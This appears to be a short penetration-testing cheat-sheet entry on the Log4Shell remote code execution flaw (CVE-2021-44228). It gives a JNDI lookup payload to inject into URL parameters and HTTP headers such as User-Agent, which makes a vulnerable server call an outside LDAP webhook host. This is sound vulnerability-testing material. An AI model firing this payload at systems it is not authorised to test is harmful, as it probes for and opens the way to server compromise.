RCE in log4j – CVE-2021-44228

How to test

Use this string in any parameter or HTTP header that can be logged. Use Burp Suite Collaborator or any other webhook.

http://example.com?param1=${jndi:ldap://somewebhook/payload1}&param2=...
GET / HTTP/1
Host: example.com
User-Agent: ${jndi:ldap://somewebhook/payload1}
...